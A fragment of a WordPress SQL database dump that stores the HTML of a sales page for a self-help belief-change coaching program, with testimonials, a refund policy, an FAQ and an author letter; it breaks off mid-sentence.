Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 13:57:37', '2014-12-14 18:57:37', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2043, 2, '2014-12-14 13:59:57', '2014-12-14 18:59:57', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<p><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p><img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be 